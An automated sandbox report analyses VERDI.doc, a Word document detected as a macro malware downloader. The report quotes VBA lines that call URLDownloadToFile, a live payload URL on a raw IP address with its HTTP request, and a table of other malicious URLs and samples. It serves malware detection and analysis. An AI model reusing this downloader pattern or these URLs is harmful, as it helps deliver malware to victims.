Loading ...

Play interactive tourEdit tour

Analysis Report VERDI.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:193292
Start date:03.12.2019
Start time:06:44:51
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:VERDI.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal84.expl.winDOC@1/13@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe
  • Execution Graph export aborted for target WINWORD.EXE, PID 3656 because there are no executed function
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold840 - 100falsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlImpact
Valid AccountsScripting11Winlogon Helper DLLProcess Injection1Masquerading1Credential DumpingProcess Discovery1Remote File Copy4Data from Local SystemData CompressedStandard Non-Application Layer Protocol2Data Destruction
Replication Through Removable MediaGraphical User Interface1Port MonitorsAccessibility FeaturesProcess Injection1Network SniffingFile and Directory Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol12Data Encrypted for Impact
External Remote ServicesExploitation for Client Execution12Accessibility FeaturesPath InterceptionScripting11Input CaptureSystem Information Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy4Disk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://192.119.106.235/mswordupd.tmpAvira URL Cloud: Label: malware
Antivirus detection for sampleShow sources
Source: VERDI.docAvira: detection malicious, Label: W97M/Dldr.Sload.xgajl
Multi AV Scanner detection for domain / URLShow sources
Source: http://192.119.106.235/mswordupd.tmpVirustotal: Detection: 14%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: VERDI.docVirustotal: Detection: 42%Perma Link
Machine Learning detection for sampleShow sources
Source: VERDI.docJoe Sandbox ML: detected

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49220 -> 192.119.106.235:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49220 -> 192.119.106.235:80

Networking:

barindex
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /mswordupd.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.119.106.235Connection: Keep-Alive
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Source: unknownTCP traffic detected without corresponding DNS query: 192.119.106.235
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /mswordupd.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.119.106.235Connection: Keep-Alive
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2019 05:45:47 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 211Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 77 6f 72 64 75 70 64 2e 74 6d 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested
Urls found in memory or binary dataShow sources
Source: WINWORD.EXE, 00000000.00000002.2483706116.00283000.00000004.00000020.sdmp, WINWORD.EXE, 00000000.00000002.2496450329.09750000.00000004.00000040.sdmpString found in binary or memory: http://192.119.106.235/mswordupd.tmp
Source: WINWORD.EXE, 00000000.00000002.2487583935.031F5000.00000004.00000001.sdmpString found in binary or memory: http://ns.ad
Source: WINWORD.EXE, 00000000.00000002.2487583935.031F5000.00000004.00000001.sdmpString found in binary or memory: http://ns.adbe.
Source: WINWORD.EXE, 00000000.00000002.2487566677.031DD000.00000004.00000001.sdmpString found in binary or memory: http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: VERDI.docOLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: VERDI.docOLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: VERDI.docOLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: VERDI.docOLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: VERDI.docOLE, VBA macro line: URLDownloadToFile 0, v1, v2, 0, 0
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Jbrw23, String urldownloadtofile: URLDownloadToFile 0, v1, v2, 0, 0Name: Jbrw23
Document contains embedded VBA macrosShow sources
Source: VERDI.docOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: VERDI.docOLE indicator has summary info: false
Source: VERDI.docOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: VERDI.docOLE indicator application name: unknown
Source: VERDI.docOLE indicator application name: unknown
Classification labelShow sources
Source: classification engineClassification label: mal84.expl.winDOC@1/13@0/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$VERDI.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR8CE3.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: VERDI.docOLE document summary: title field not present or empty
Source: VERDI.docOLE document summary: author field not present or empty
Source: VERDI.docOLE document summary: edited time not present or 0
Source: VERDI.docOLE document summary: title field not present or empty
Source: VERDI.docOLE document summary: author field not present or empty
Source: VERDI.docOLE document summary: edited time not present or 0
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Sample is known by AntivirusShow sources
Source: VERDI.docVirustotal: Detection: 42%
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Document is a ZIP file with path names indicative of goodwareShow sources
Source: VERDI.docInitial sample: OLE zip file path = word/media/image1.wmf
Source: VERDI.docInitial sample: OLE zip file path = word/media/image4.jpeg
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: scrrun.pdb source: WINWORD.EXE, 00000000.00000002.2492702224.065F0000.00000002.00000001.sdmp
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000000.00000002.2487995411.03AE0000.00000002.00000001.sdmp
Document has a 'vbamacros' value indicative of goodwareShow sources
Source: VERDI.docInitial sample: OLE indicators vbamacros = False

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: WINWORD.EXE, 00000000.00000002.2483869243.00540000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: WINWORD.EXE, 00000000.00000002.2483869243.00540000.00000002.00000001.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000000.00000002.2483869243.00540000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
VERDI.doc43%VirustotalBrowse
VERDI.doc100%AviraW97M/Dldr.Sload.xgajl
VERDI.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://192.119.106.235/mswordupd.tmp14%VirustotalBrowse
http://192.119.106.235/mswordupd.tmp100%Avira URL Cloudmalware
http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.0%Avira URL Cloudsafe
http://ns.adbe.0%URL Reputationsafe
http://ns.ad0%VirustotalBrowse
http://ns.ad0%URL Reputationsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknownORDER_IMAGES_20108.docGet hashmaliciousBrowse
  • 162.144.128.116
915.exeGet hashmaliciousBrowse
  • 14.102.249.147
915.exeGet hashmaliciousBrowse
  • 112.213.106.150
VM- 21-11-2019 - Missed Call.htmGet hashmaliciousBrowse
  • 46.149.115.114
http://url7050.microsoftaccountactivities.com/wf/click?upn=4k2-2F1WrnSGbkq14RZIa3TyCnW7mzRsQmtY4-2F1ptosk9K24NM18HM-2Furnn9juKSAwdeScYIZAkNda1HtQpXEYTlpozzFRqjM1N5g-2FG3WbL3k-3D_5w-2BFcaNq82qXD2HgdzlE4rOAaUDin4UQptcww6LJZQPBIl-2BTp4nbAotUZSp0Io3602VK5YSrDvF7zQxMgo-2Bfo0pepZIcGwS9U3TRPiAh0uV90P-2BXl5L2wyRz76E7Exf-2BgREEboUp5n-2B3Yiqd91TAC2gRrnx1TFS0V9kH3ew0jLucFBYtIbIbKSiQZMVgrVg2w6-2BvD08FA0FFEIVkaoEe2gc-2BSj1UwcFX7kCGU0VwcWqRh6Nbg3WgcSjDn9RmisWtSn7OnMMYTTipRCov27PKbz-2BDSu8YXU-2BI32vGFO7sM0ss9PWksQAlwRk85-2FHMlsHyuJttqt2l0XqZUouk2SxmCSe7iZyRJAJp9asJ2x0fbv55GrIXvhSz-2BBcp1ag57EbWf2gwBrVrmihQ-2Bv4kh3PTdbjrd-2Bo41gwZsbpK8kwcKd9zDOM4pUe-2B9gBTPV-2FGwLFKWhqvsgJcUkTtmDhKygHXffa-2Fr6Sfiui5adNBugks-2FbT7heWDenP73C-2BXdjJDEnPwfQtwKzSIW7vpiG119WPxbTBsXCWs0sL1akAkOgmdtW1RWAGFWL1Te14zTscnE5YLOT7-2B4cRb90GhmC-2Fnsct7Lw-3D-3DGet hashmaliciousBrowse
  • 167.89.115.56
http://2fa.com-token-auth.com/XYWNh0aW9uPWn9wZW4mcmaVjaXBpthZW50tX2lkPTUzaODckzNTA1MiZjYW1wYWlnubl9ydW5faWQ9MjU5NzM3MQ==Get hashmaliciousBrowse
  • 54.88.231.54
http://2fa.com-token-auth.com/XYWNn0aW9uPWaNsaWNrJnbVybD1ocudHRwkczovL3NldY3sVyZWQtbG9naW4ubmV0nL3BhZ2VzL2YwZTVkNmE1YzMzNSZyZWNpcGllbnRfaWQ9NTM4OTM1MDUyJmNhbXBhaWduX3J1bl9pZD0yNTk3MzcxGet hashmaliciousBrowse
  • 35.156.37.214
FileZilla_3.45.1_win64_sponsored-setup.exeGet hashmaliciousBrowse
  • 136.243.154.122
QPE-011219 UFKJ-021219.docGet hashmaliciousBrowse
  • 190.5.162.204
NF-8233 Medical report p2.docGet hashmaliciousBrowse
  • 205.144.171.72
http://r20.rs6.net/tn.jsp?f=001D1XLQE3ZjXzgwTs6nHI6RYbH3b4SXqPzGbZarKsffD47NA5r3pqgtDlFZ673V1vYrJvxWSNvvqLRQppp6LYUMi-22aIiEeVfSEb7Bc2ugrOAD9gcIuxWcnKx9Wa9sx8vs_0VAviwSBkj2D0DL1pHpKHSwFPU3g_f&c=h7JmDAAK_nA8eA-_jh3KFz7S9_PQyJS7Hyeema4LbJsgkde-Dn_nig==&ch=ZLeavC3pcNI1Oa87RpxBZ619N_MCFfplW1lvWq4GSLIxLv2FlcOCdg==Get hashmaliciousBrowse
  • 208.75.122.11
INV0ICE_.EXEGet hashmaliciousBrowse
  • 194.5.97.34
https://xurl.es/5d6r3Get hashmaliciousBrowse
  • 104.28.28.62
http://122.228.19.80Get hashmaliciousBrowse
  • 122.228.19.80
d.exeGet hashmaliciousBrowse
  • 156.67.222.222
d.exeGet hashmaliciousBrowse
  • 156.67.222.222
Document for review appraisal.exeGet hashmaliciousBrowse
  • 194.35.114.15
https://shahrearwpd.com//#waterquality@gswater.comGet hashmaliciousBrowse
  • 213.136.72.26
http://dl.drp.su/updates/beetle/driverpack-7za.exeGet hashmaliciousBrowse
  • 87.117.239.150

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.